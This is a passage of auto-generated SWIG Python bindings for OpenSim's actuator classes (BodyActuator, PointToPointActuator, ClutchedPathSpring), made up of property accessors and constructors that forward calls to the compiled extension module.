return _actuators.BodyActuator_get_point(self, *args)
def upd_point(self, *args):
"""
upd_point(BodyActuator self, int i) -> Vec3
Parameters
----------
i: int
upd_point(BodyActuator self) -> Vec3
Parameters
----------
self: OpenSim::BodyActuator *
"""
return _actuators.BodyActuator_upd_point(self, *args)
def set_point(self, *args):
"""
set_point(BodyActuator self, int i, Vec3 value)
Parameters
----------
i: int
value: SimTK::Vec3 const &
set_point(BodyActuator self, Vec3 value)
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.BodyActuator_set_point(self, *args)
def copyProperty_point_is_global(self, source):
"""
copyProperty_point_is_global(BodyActuator self, BodyActuator source)
Parameters
----------
source: OpenSim::BodyActuator::Self const &
"""
return _actuators.BodyActuator_copyProperty_point_is_global(self, source)
def append_point_is_global(self, value):
"""
append_point_is_global(BodyActuator self, bool const & value) -> int
Parameters
----------
value: bool const &
"""
return _actuators.BodyActuator_append_point_is_global(self, value)
def constructProperty_point_is_global(self, initValue):
"""
constructProperty_point_is_global(BodyActuator self, bool const & initValue)
Parameters
----------
initValue: bool const &
"""
return _actuators.BodyActuator_constructProperty_point_is_global(self, initValue)
def get_point_is_global(self, *args):
"""
get_point_is_global(BodyActuator self, int i) -> bool const
Parameters
----------
i: int
get_point_is_global(BodyActuator self) -> bool const &
Parameters
----------
self: OpenSim::BodyActuator const *
"""
return _actuators.BodyActuator_get_point_is_global(self, *args)
def upd_point_is_global(self, *args):
"""
upd_point_is_global(BodyActuator self, int i) -> bool
Parameters
----------
i: int
upd_point_is_global(BodyActuator self) -> bool &
Parameters
----------
self: OpenSim::BodyActuator *
"""
return _actuators.BodyActuator_upd_point_is_global(self, *args)
def set_point_is_global(self, *args):
"""
set_point_is_global(BodyActuator self, int i, bool const & value)
Parameters
----------
i: int
value: bool const &
set_point_is_global(BodyActuator self, bool const & value)
Parameters
----------
value: bool const &
"""
return _actuators.BodyActuator_set_point_is_global(self, *args)
def copyProperty_spatial_force_is_global(self, source):
"""
copyProperty_spatial_force_is_global(BodyActuator self, BodyActuator source)
Parameters
----------
source: OpenSim::BodyActuator::Self const &
"""
return _actuators.BodyActuator_copyProperty_spatial_force_is_global(self, source)
def append_spatial_force_is_global(self, value):
"""
append_spatial_force_is_global(BodyActuator self, bool const & value) -> int
Parameters
----------
value: bool const &
"""
return _actuators.BodyActuator_append_spatial_force_is_global(self, value)
def constructProperty_spatial_force_is_global(self, initValue):
"""
constructProperty_spatial_force_is_global(BodyActuator self, bool const & initValue)
Parameters
----------
initValue: bool const &
"""
return _actuators.BodyActuator_constructProperty_spatial_force_is_global(self, initValue)
def get_spatial_force_is_global(self, *args):
"""
get_spatial_force_is_global(BodyActuator self, int i) -> bool const
Parameters
----------
i: int
get_spatial_force_is_global(BodyActuator self) -> bool const &
Parameters
----------
self: OpenSim::BodyActuator const *
"""
return _actuators.BodyActuator_get_spatial_force_is_global(self, *args)
def upd_spatial_force_is_global(self, *args):
"""
upd_spatial_force_is_global(BodyActuator self, int i) -> bool
Parameters
----------
i: int
upd_spatial_force_is_global(BodyActuator self) -> bool &
Parameters
----------
self: OpenSim::BodyActuator *
"""
return _actuators.BodyActuator_upd_spatial_force_is_global(self, *args)
def set_spatial_force_is_global(self, *args):
"""
set_spatial_force_is_global(BodyActuator self, int i, bool const & value)
Parameters
----------
i: int
value: bool const &
set_spatial_force_is_global(BodyActuator self, bool const & value)
Parameters
----------
value: bool const &
"""
return _actuators.BodyActuator_set_spatial_force_is_global(self, *args)
__swig_setmethods__["PropertyIndex_socket_body"] = _actuators.BodyActuator_PropertyIndex_socket_body_set
__swig_getmethods__["PropertyIndex_socket_body"] = _actuators.BodyActuator_PropertyIndex_socket_body_get
if _newclass:
PropertyIndex_socket_body = _swig_property(_actuators.BodyActuator_PropertyIndex_socket_body_get, _actuators.BodyActuator_PropertyIndex_socket_body_set)
def connectSocket_body(self, object):
"""
connectSocket_body(BodyActuator self, OpenSimObject object)
Parameters
----------
object: OpenSim::Object const &
"""
return _actuators.BodyActuator_connectSocket_body(self, object)
def __init__(self, *args):
"""
__init__(OpenSim::BodyActuator self) -> BodyActuator
__init__(OpenSim::BodyActuator self, Body body, Vec3 point, bool pointIsGlobal=False, bool spatialForceIsGlobal=True) -> BodyActuator
Parameters
----------
body: OpenSim::Body const &
point: SimTK::Vec3 const &
pointIsGlobal: bool
spatialForceIsGlobal: bool
__init__(OpenSim::BodyActuator self, Body body, Vec3 point, bool pointIsGlobal=False) -> BodyActuator
Parameters
----------
body: OpenSim::Body const &
point: SimTK::Vec3 const &
pointIsGlobal: bool
__init__(OpenSim::BodyActuator self, Body body, Vec3 point) -> BodyActuator
Parameters
----------
body: OpenSim::Body const &
point: SimTK::Vec3 const &
__init__(OpenSim::BodyActuator self, Body body) -> BodyActuator
Parameters
----------
body: OpenSim::Body const &
"""
this = _actuators.new_BodyActuator(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def setPoint(self, point):
"""
setPoint(BodyActuator self, Vec3 point)
Parameters
----------
point: SimTK::Vec3 &
"""
return _actuators.BodyActuator_setPoint(self, point)
def getPoint(self):
"""
getPoint(BodyActuator self) -> Vec3
Parameters
----------
self: OpenSim::BodyActuator const *
"""
return _actuators.BodyActuator_getPoint(self)
def setPointForceIsGlobal(self, isGlobal):
"""
setPointForceIsGlobal(BodyActuator self, bool isGlobal)
Parameters
----------
isGlobal: bool
"""
return _actuators.BodyActuator_setPointForceIsGlobal(self, isGlobal)
def getPointIsGlobal(self):
"""
getPointIsGlobal(BodyActuator self) -> bool
Parameters
----------
self: OpenSim::BodyActuator const *
"""
return _actuators.BodyActuator_getPointIsGlobal(self)
def setSpatialForceIsGlobal(self, isGlobal):
"""
setSpatialForceIsGlobal(BodyActuator self, bool isGlobal)
Parameters
----------
isGlobal: bool
"""
return _actuators.BodyActuator_setSpatialForceIsGlobal(self, isGlobal)
def getSpatialForceIsGlobal(self):
"""
getSpatialForceIsGlobal(BodyActuator self) -> bool
Parameters
----------
self: OpenSim::BodyActuator const *
"""
return _actuators.BodyActuator_getSpatialForceIsGlobal(self)
def setBody(self, body):
"""
setBody(BodyActuator self, Body body)
Parameters
----------
body: OpenSim::Body const &
"""
return _actuators.BodyActuator_setBody(self, body)
def getBody(self):
"""
getBody(BodyActuator self) -> Body
Parameters
----------
self: OpenSim::BodyActuator const *
"""
return _actuators.BodyActuator_getBody(self)
def setBodyName(self, name):
"""
setBodyName(BodyActuator self, std::string const & name)
Parameters
----------
name: std::string const &
"""
return _actuators.BodyActuator_setBodyName(self, name)
def getBodyName(self):
"""
getBodyName(BodyActuator self) -> std::string const &
Parameters
----------
self: OpenSim::BodyActuator const *
"""
return _actuators.BodyActuator_getBodyName(self)
__swig_destroy__ = _actuators.delete_BodyActuator
__del__ = lambda self: None
BodyActuator_swigregister = _actuators.BodyActuator_swigregister
BodyActuator_swigregister(BodyActuator)
def BodyActuator_safeDownCast(obj):
"""
BodyActuator_safeDownCast(OpenSimObject obj) -> BodyActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.BodyActuator_safeDownCast(obj)
def BodyActuator_getClassName():
"""BodyActuator_getClassName() -> std::string const &"""
return _actuators.BodyActuator_getClassName()
class PointToPointActuator(opensim.simulation.ScalarActuator):
"""Proxy of C++ OpenSim::PointToPointActuator class."""
__swig_setmethods__ = {}
for _s in [opensim.simulation.ScalarActuator]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, PointToPointActuator, name, value)
__swig_getmethods__ = {}
for _s in [opensim.simulation.ScalarActuator]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, PointToPointActuator, name)
__repr__ = _swig_repr
def safeDownCast(obj):
"""
safeDownCast(OpenSimObject obj) -> PointToPointActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.PointToPointActuator_safeDownCast(obj)
safeDownCast = staticmethod(safeDownCast)
def assign(self, aObject):
"""
assign(PointToPointActuator self, OpenSimObject aObject)
Parameters
----------
aObject: OpenSim::Object &
"""
return _actuators.PointToPointActuator_assign(self, aObject)
def getClassName():
"""getClassName() -> std::string const &"""
return _actuators.PointToPointActuator_getClassName()
getClassName = staticmethod(getClassName)
def clone(self):
"""
clone(PointToPointActuator self) -> PointToPointActuator
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_clone(self)
def getConcreteClassName(self):
"""
getConcreteClassName(PointToPointActuator self) -> std::string const &
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_getConcreteClassName(self)
def copyProperty_bodyA(self, source):
"""
copyProperty_bodyA(PointToPointActuator self, PointToPointActuator source)
Parameters
----------
source: OpenSim::PointToPointActuator::Self const &
"""
return _actuators.PointToPointActuator_copyProperty_bodyA(self, source)
def append_bodyA(self, value):
"""
append_bodyA(PointToPointActuator self, std::string const & value) -> int
Parameters
----------
value: std::string const &
"""
return _actuators.PointToPointActuator_append_bodyA(self, value)
def constructProperty_bodyA(self, *args):
"""
constructProperty_bodyA(PointToPointActuator self)
constructProperty_bodyA(PointToPointActuator self, std::string const & initValue)
Parameters
----------
initValue: std::string const &
"""
return _actuators.PointToPointActuator_constructProperty_bodyA(self, *args)
def get_bodyA(self, *args):
"""
get_bodyA(PointToPointActuator self, int i) -> std::string const
Parameters
----------
i: int
get_bodyA(PointToPointActuator self) -> std::string const &
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_get_bodyA(self, *args)
def upd_bodyA(self, *args):
"""
upd_bodyA(PointToPointActuator self, int i) -> std::string
Parameters
----------
i: int
upd_bodyA(PointToPointActuator self) -> std::string &
Parameters
----------
self: OpenSim::PointToPointActuator *
"""
return _actuators.PointToPointActuator_upd_bodyA(self, *args)
def set_bodyA(self, *args):
"""
set_bodyA(PointToPointActuator self, int i, std::string const & value)
Parameters
----------
i: int
value: std::string const &
set_bodyA(PointToPointActuator self, std::string const & value)
Parameters
----------
value: std::string const &
"""
return _actuators.PointToPointActuator_set_bodyA(self, *args)
def copyProperty_bodyB(self, source):
"""
copyProperty_bodyB(PointToPointActuator self, PointToPointActuator source)
Parameters
----------
source: OpenSim::PointToPointActuator::Self const &
"""
return _actuators.PointToPointActuator_copyProperty_bodyB(self, source)
def append_bodyB(self, value):
"""
append_bodyB(PointToPointActuator self, std::string const & value) -> int
Parameters
----------
value: std::string const &
"""
return _actuators.PointToPointActuator_append_bodyB(self, value)
def constructProperty_bodyB(self, *args):
"""
constructProperty_bodyB(PointToPointActuator self)
constructProperty_bodyB(PointToPointActuator self, std::string const & initValue)
Parameters
----------
initValue: std::string const &
"""
return _actuators.PointToPointActuator_constructProperty_bodyB(self, *args)
def get_bodyB(self, *args):
"""
get_bodyB(PointToPointActuator self, int i) -> std::string const
Parameters
----------
i: int
get_bodyB(PointToPointActuator self) -> std::string const &
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_get_bodyB(self, *args)
def upd_bodyB(self, *args):
"""
upd_bodyB(PointToPointActuator self, int i) -> std::string
Parameters
----------
i: int
upd_bodyB(PointToPointActuator self) -> std::string &
Parameters
----------
self: OpenSim::PointToPointActuator *
"""
return _actuators.PointToPointActuator_upd_bodyB(self, *args)
def set_bodyB(self, *args):
"""
set_bodyB(PointToPointActuator self, int i, std::string const & value)
Parameters
----------
i: int
value: std::string const &
set_bodyB(PointToPointActuator self, std::string const & value)
Parameters
----------
value: std::string const &
"""
return _actuators.PointToPointActuator_set_bodyB(self, *args)
def copyProperty_points_are_global(self, source):
"""
copyProperty_points_are_global(PointToPointActuator self, PointToPointActuator source)
Parameters
----------
source: OpenSim::PointToPointActuator::Self const &
"""
return _actuators.PointToPointActuator_copyProperty_points_are_global(self, source)
def append_points_are_global(self, value):
"""
append_points_are_global(PointToPointActuator self, bool const & value) -> int
Parameters
----------
value: bool const &
"""
return _actuators.PointToPointActuator_append_points_are_global(self, value)
def constructProperty_points_are_global(self, initValue):
"""
constructProperty_points_are_global(PointToPointActuator self, bool const & initValue)
Parameters
----------
initValue: bool const &
"""
return _actuators.PointToPointActuator_constructProperty_points_are_global(self, initValue)
def get_points_are_global(self, *args):
"""
get_points_are_global(PointToPointActuator self, int i) -> bool const
Parameters
----------
i: int
get_points_are_global(PointToPointActuator self) -> bool const &
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_get_points_are_global(self, *args)
def upd_points_are_global(self, *args):
"""
upd_points_are_global(PointToPointActuator self, int i) -> bool
Parameters
----------
i: int
upd_points_are_global(PointToPointActuator self) -> bool &
Parameters
----------
self: OpenSim::PointToPointActuator *
"""
return _actuators.PointToPointActuator_upd_points_are_global(self, *args)
def set_points_are_global(self, *args):
"""
set_points_are_global(PointToPointActuator self, int i, bool const & value)
Parameters
----------
i: int
value: bool const &
set_points_are_global(PointToPointActuator self, bool const & value)
Parameters
----------
value: bool const &
"""
return _actuators.PointToPointActuator_set_points_are_global(self, *args)
def copyProperty_pointA(self, source):
"""
copyProperty_pointA(PointToPointActuator self, PointToPointActuator source)
Parameters
----------
source: OpenSim::PointToPointActuator::Self const &
"""
return _actuators.PointToPointActuator_copyProperty_pointA(self, source)
def append_pointA(self, value):
"""
append_pointA(PointToPointActuator self, Vec3 value) -> int
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.PointToPointActuator_append_pointA(self, value)
def constructProperty_pointA(self, initValue):
"""
constructProperty_pointA(PointToPointActuator self, Vec3 initValue)
Parameters
----------
initValue: SimTK::Vec3 const &
"""
return _actuators.PointToPointActuator_constructProperty_pointA(self, initValue)
def get_pointA(self, *args):
"""
get_pointA(PointToPointActuator self, int i) -> Vec3
Parameters
----------
i: int
get_pointA(PointToPointActuator self) -> Vec3
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_get_pointA(self, *args)
def upd_pointA(self, *args):
"""
upd_pointA(PointToPointActuator self, int i) -> Vec3
Parameters
----------
i: int
upd_pointA(PointToPointActuator self) -> Vec3
Parameters
----------
self: OpenSim::PointToPointActuator *
"""
return _actuators.PointToPointActuator_upd_pointA(self, *args)
def set_pointA(self, *args):
"""
set_pointA(PointToPointActuator self, int i, Vec3 value)
Parameters
----------
i: int
value: SimTK::Vec3 const &
set_pointA(PointToPointActuator self, Vec3 value)
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.PointToPointActuator_set_pointA(self, *args)
def copyProperty_pointB(self, source):
"""
copyProperty_pointB(PointToPointActuator self, PointToPointActuator source)
Parameters
----------
source: OpenSim::PointToPointActuator::Self const &
"""
return _actuators.PointToPointActuator_copyProperty_pointB(self, source)
def append_pointB(self, value):
"""
append_pointB(PointToPointActuator self, Vec3 value) -> int
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.PointToPointActuator_append_pointB(self, value)
def constructProperty_pointB(self, initValue):
"""
constructProperty_pointB(PointToPointActuator self, Vec3 initValue)
Parameters
----------
initValue: SimTK::Vec3 const &
"""
return _actuators.PointToPointActuator_constructProperty_pointB(self, initValue)
def get_pointB(self, *args):
"""
get_pointB(PointToPointActuator self, int i) -> Vec3
Parameters
----------
i: int
get_pointB(PointToPointActuator self) -> Vec3
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_get_pointB(self, *args)
def upd_pointB(self, *args):
"""
upd_pointB(PointToPointActuator self, int i) -> Vec3
Parameters
----------
i: int
upd_pointB(PointToPointActuator self) -> Vec3
Parameters
----------
self: OpenSim::PointToPointActuator *
"""
return _actuators.PointToPointActuator_upd_pointB(self, *args)
def set_pointB(self, *args):
"""
set_pointB(PointToPointActuator self, int i, Vec3 value)
Parameters
----------
i: int
value: SimTK::Vec3 const &
set_pointB(PointToPointActuator self, Vec3 value)
Parameters
----------
value: SimTK::Vec3 const &
"""
return _actuators.PointToPointActuator_set_pointB(self, *args)
def copyProperty_optimal_force(self, source):
"""
copyProperty_optimal_force(PointToPointActuator self, PointToPointActuator source)
Parameters
----------
source: OpenSim::PointToPointActuator::Self const &
"""
return _actuators.PointToPointActuator_copyProperty_optimal_force(self, source)
def append_optimal_force(self, value):
"""
append_optimal_force(PointToPointActuator self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.PointToPointActuator_append_optimal_force(self, value)
def constructProperty_optimal_force(self, initValue):
"""
constructProperty_optimal_force(PointToPointActuator self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.PointToPointActuator_constructProperty_optimal_force(self, initValue)
def get_optimal_force(self, *args):
"""
get_optimal_force(PointToPointActuator self, int i) -> double const
Parameters
----------
i: int
get_optimal_force(PointToPointActuator self) -> double const &
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_get_optimal_force(self, *args)
def upd_optimal_force(self, *args):
"""
upd_optimal_force(PointToPointActuator self, int i) -> double
Parameters
----------
i: int
upd_optimal_force(PointToPointActuator self) -> double &
Parameters
----------
self: OpenSim::PointToPointActuator *
"""
return _actuators.PointToPointActuator_upd_optimal_force(self, *args)
def set_optimal_force(self, *args):
"""
set_optimal_force(PointToPointActuator self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_optimal_force(PointToPointActuator self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.PointToPointActuator_set_optimal_force(self, *args)
def __init__(self, *args):
"""
__init__(OpenSim::PointToPointActuator self) -> PointToPointActuator
__init__(OpenSim::PointToPointActuator self, std::string const & bodyNameA, std::string const & bodyNameB) -> PointToPointActuator
Parameters
----------
bodyNameA: std::string const &
bodyNameB: std::string const &
"""
this = _actuators.new_PointToPointActuator(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def setPointA(self, pointAPos):
"""
setPointA(PointToPointActuator self, Vec3 pointAPos)
Parameters
----------
pointAPos: SimTK::Vec3 const &
"""
return _actuators.PointToPointActuator_setPointA(self, pointAPos)
def getPointA(self):
"""
getPointA(PointToPointActuator self) -> Vec3
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_getPointA(self)
def setPointB(self, pointBPos):
"""
setPointB(PointToPointActuator self, Vec3 pointBPos)
Parameters
----------
pointBPos: SimTK::Vec3 const &
"""
return _actuators.PointToPointActuator_setPointB(self, pointBPos)
def getPointB(self):
"""
getPointB(PointToPointActuator self) -> Vec3
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_getPointB(self)
def setPointsAreGlobal(self, isGlobal):
"""
setPointsAreGlobal(PointToPointActuator self, bool isGlobal)
Parameters
----------
isGlobal: bool
"""
return _actuators.PointToPointActuator_setPointsAreGlobal(self, isGlobal)
def getPointsAreGlobal(self):
"""
getPointsAreGlobal(PointToPointActuator self) -> bool
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_getPointsAreGlobal(self)
def setOptimalForce(self, optimalForce):
"""
setOptimalForce(PointToPointActuator self, double optimalForce)
Parameters
----------
optimalForce: double
"""
return _actuators.PointToPointActuator_setOptimalForce(self, optimalForce)
def getOptimalForce(self):
"""
getOptimalForce(PointToPointActuator self) -> double
Parameters
----------
self: OpenSim::PointToPointActuator const *
"""
return _actuators.PointToPointActuator_getOptimalForce(self)
__swig_destroy__ = _actuators.delete_PointToPointActuator
__del__ = lambda self: None
PointToPointActuator_swigregister = _actuators.PointToPointActuator_swigregister
PointToPointActuator_swigregister(PointToPointActuator)
def PointToPointActuator_safeDownCast(obj):
"""
PointToPointActuator_safeDownCast(OpenSimObject obj) -> PointToPointActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.PointToPointActuator_safeDownCast(obj)
def PointToPointActuator_getClassName():
"""PointToPointActuator_getClassName() -> std::string const &"""
return _actuators.PointToPointActuator_getClassName()
class ClutchedPathSpring(opensim.simulation.PathActuator):
"""Proxy of C++ OpenSim::ClutchedPathSpring class."""
__swig_setmethods__ = {}
for _s in [opensim.simulation.PathActuator]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, ClutchedPathSpring, name, value)
__swig_getmethods__ = {}
for _s in [opensim.simulation.PathActuator]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, ClutchedPathSpring, name)
__repr__ = _swig_repr
def safeDownCast(obj):
"""
safeDownCast(OpenSimObject obj) -> ClutchedPathSpring
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.ClutchedPathSpring_safeDownCast(obj)
safeDownCast = staticmethod(safeDownCast)
def assign(self, aObject):
"""
assign(ClutchedPathSpring self, OpenSimObject aObject)
Parameters
----------
aObject: OpenSim::Object &
"""
return _actuators.ClutchedPathSpring_assign(self, aObject)
def getClassName():
"""getClassName() -> std::string const &"""
return _actuators.ClutchedPathSpring_getClassName()
getClassName = staticmethod(getClassName)
def clone(self):
"""
clone(ClutchedPathSpring self) -> ClutchedPathSpring
Parameters
----------
self: OpenSim::ClutchedPathSpring const *
"""
return _actuators.ClutchedPathSpring_clone(self)
def getConcreteClassName(self):
"""
getConcreteClassName(ClutchedPathSpring self) -> std::string const &
Parameters
----------
self: OpenSim::ClutchedPathSpring const *
"""
return _actuators.ClutchedPathSpring_getConcreteClassName(self)
def copyProperty_stiffness(self, source):
"""
copyProperty_stiffness(ClutchedPathSpring self, ClutchedPathSpring source)
Parameters
----------
source: OpenSim::ClutchedPathSpring::Self const &
"""
return _actuators.ClutchedPathSpring_copyProperty_stiffness(self, source)
def append_stiffness(self, value):
"""
append_stiffness(ClutchedPathSpring self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.ClutchedPathSpring_append_stiffness(self, value)
def constructProperty_stiffness(self, initValue):
"""
constructProperty_stiffness(ClutchedPathSpring self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.ClutchedPathSpring_constructProperty_stiffness(self, initValue)
def get_stiffness(self, *args):
"""
get_stiffness(ClutchedPathSpring self, int i) -> double const
Parameters
----------
i: int
get_stiffness(ClutchedPathSpring self) -> double const &
Parameters
----------
self: OpenSim::ClutchedPathSpring const *
"""
return _actuators.ClutchedPathSpring_get_stiffness(self, *args)
def upd_stiffness(self, *args):
"""
upd_stiffness(ClutchedPathSpring self, int i) -> double
Parameters
----------
i: int
upd_stiffness(ClutchedPathSpring self) -> double &
Parameters
----------
self: OpenSim::ClutchedPathSpring *
"""
return _actuators.ClutchedPathSpring_upd_stiffness(self, *args)
def set_stiffness(self, *args):
"""
set_stiffness(ClutchedPathSpring self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_stiffness(ClutchedPathSpring self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.ClutchedPathSpring_set_stiffness(self, *args)
def copyProperty_dissipation(self, source):
"""
copyProperty_dissipation(ClutchedPathSpring self, ClutchedPathSpring source)
Parameters
----------
source: OpenSim::ClutchedPathSpring::Self const &
"""
return _actuators.ClutchedPathSpring_copyProperty_dissipation(self, source)
def append_dissipation(self, value):
"""
append_dissipation(ClutchedPathSpring self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.ClutchedPathSpring_append_dissipation(self, value)
def constructProperty_dissipation(self, initValue):
"""
constructProperty_dissipation(ClutchedPathSpring self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.ClutchedPathSpring_constructProperty_dissipation(self, initValue)
def get_dissipation(self, *args):
"""
get_dissipation(ClutchedPathSpring self, int i) -> double const
Parameters
----------
i: int
get_dissipation(ClutchedPathSpring self) -> double const &
Parameters
----------
self: OpenSim::ClutchedPathSpring const *
"""
return _actuators.ClutchedPathSpring_get_dissipation(self, *args)
def upd_dissipation(self, *args):
"""
upd_dissipation(ClutchedPathSpring self, int i) -> double
Parameters
----------
i: int
upd_dissipation(ClutchedPathSpring self) -> double &
Parameters
----------
self: OpenSim::ClutchedPathSpring *
"""
return _actuators.ClutchedPathSpring_upd_dissipation(self, *args)
def set_dissipation(self, *args):
"""
set_dissipation(ClutchedPathSpring self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_dissipation(ClutchedPathSpring self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.ClutchedPathSpring_set_dissipation(self, *args)
def copyProperty_relaxation_time_constant(self, source):
"""
copyProperty_relaxation_time_constant(ClutchedPathSpring self, ClutchedPathSpring source)
Parameters
----------
source: OpenSim::ClutchedPathSpring::Self const &
"""
return _actuators.ClutchedPathSpring_copyProperty_relaxation_time_constant(self, source)
def append_relaxation_time_constant(self, value):
"""
append_relaxation_time_constant(ClutchedPathSpring self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.ClutchedPathSpring_append_relaxation_time_constant(self, value)
def constructProperty_relaxation_time_constant(self, initValue):
"""
constructProperty_relaxation_time_constant(ClutchedPathSpring self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.ClutchedPathSpring_constructProperty_relaxation_time_constant(self, initValue)
def get_relaxation_time_constant(self, *args):
"""
get_relaxation_time_constant(ClutchedPathSpring self, int i) -> double const
Parameters
----------
i: int
get_relaxation_time_constant(ClutchedPathSpring self) -> double const &
Parameters
----------
self: OpenSim::ClutchedPathSpring const *
"""
return _actuators.ClutchedPathSpring_get_relaxation_time_constant(self, *args)
def upd_relaxation_time_constant(self, *args):
"""
upd_relaxation_time_constant(ClutchedPathSpring self, int i) -> double
Parameters
----------
i: int
upd_relaxation_time_constant(ClutchedPathSpring self) -> double &
Parameters
----------
self: OpenSim::ClutchedPathSpring *
"""
return _actuators.ClutchedPathSpring_upd_relaxation_time_constant(self, *args)
def set_relaxation_time_constant(self, *args):
"""
set_relaxation_time_constant(ClutchedPathSpring self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_relaxation_time_constant(ClutchedPathSpring self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.ClutchedPathSpring_set_relaxation_time_constant(self, *args)
def copyProperty_initial_stretch(self, source):
"""
copyProperty_initial_stretch(ClutchedPathSpring self, ClutchedPathSpring source)
Parameters
----------
source: OpenSim::ClutchedPathSpring::Self const &
"""
return _actuators.ClutchedPathSpring_copyProperty_initial_stretch(self, source)
def append_initial_stretch(self, value):
"""
append_initial_stretch(ClutchedPathSpring self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.ClutchedPathSpring_append_initial_stretch(self, value)
def constructProperty_initial_stretch(self, initValue):
"""
constructProperty_initial_stretch(ClutchedPathSpring self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.ClutchedPathSpring_constructProperty_initial_stretch(self, initValue)
def get_initial_stretch(self, *args):
"""
get_initial_stretch(ClutchedPathSpring self, int i) -> double const
Parameters
----------
i: int
get_initial_stretch(ClutchedPathSpring self) -> double const &
Parameters
----------
self: OpenSim::ClutchedPathSpring const *
"""
return _actuators.ClutchedPathSpring_get_initial_stretch(self, *args)
def upd_initial_stretch(self, *args):
"""
upd_initial_stretch(ClutchedPathSpring self, int i) -> double
Parameters
----------
i: int
upd_initial_stretch(ClutchedPathSpring self) -> double &
Parameters
----------
self: OpenSim::ClutchedPathSpring *
"""
return _actuators.ClutchedPathSpring_upd_initial_stretch(self, *args)
def set_initial_stretch(self, *args):
"""
set_initial_stretch(ClutchedPathSpring self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_initial_stretch(ClutchedPathSpring self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.ClutchedPathSpring_set_initial_stretch(self, *args)
def __init__(self, *args):
"""
__init__(OpenSim::ClutchedPathSpring self) -> ClutchedPathSpring
__init__(OpenSim::ClutchedPathSpring self, std::string const & name, double stiffness, double dissipation, double relaxationTau, double stretch0=0.0) -> ClutchedPathSpring
Parameters
----------
name: std::string const &
stiffness: double
dissipation: double
relaxationTau: double
stretch0: double
__init__(OpenSim::ClutchedPathSpring self, std::string const & name, double stiffness, double dissipation, double relaxationTau) -> ClutchedPathSpring
Parameters
----------
name: std::string const &
stiffness: double
dissipation: double
relaxationTau: double
"""
this = _actuators.new_ClutchedPathSpring(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def getStiffness(self):
"""
getStiffness(ClutchedPathSpring self) -> double
Parameters
----------
self: OpenSim::ClutchedPathSpring const *
"""
return _actuators.ClutchedPathSpring_getStiffness(self)
def setStiffness(self, stiffness):
"""
setStiffness(ClutchedPathSpring self, double stiffness)
Parameters
----------
stiffness: double
"""
return _actuators.ClutchedPathSpring_setStiffness(self, stiffness)
def getDissipation(self):
"""
getDissipation(ClutchedPathSpring self) -> double
Parameters
----------
self: OpenSim::ClutchedPathSpring const *
"""
return _actuators.ClutchedPathSpring_getDissipation(self)
def setDissipation(self, dissipation):
"""
setDissipation(ClutchedPathSpring self, double dissipation)
Parameters
----------
dissipation: double
"""
return _actuators.ClutchedPathSpring_setDissipation(self, dissipation)
def getInitialStretch(self):
"""
getInitialStretch(ClutchedPathSpring self) -> double
Parameters
----------
self: OpenSim::ClutchedPathSpring *
"""
return _actuators.ClutchedPathSpring_getInitialStretch(self)
def setInitialStretch(self, stretch0):
"""
setInitialStretch(ClutchedPathSpring self, double stretch0)
Parameters
----------
stretch0: double
"""
return _actuators.ClutchedPathSpring_setInitialStretch(self, stretch0)
def getStretch(self, s):
"""
getStretch(ClutchedPathSpring self, State s) -> double
Parameters
----------
s: SimTK::State const &
"""
return _actuators.ClutchedPathSpring_getStretch(self, s)
def getTension(self, s):
"""
getTension(ClutchedPathSpring self, State s) -> double
Parameters
----------
s: SimTK::State const &
"""
return _actuators.ClutchedPathSpring_getTension(self, s)
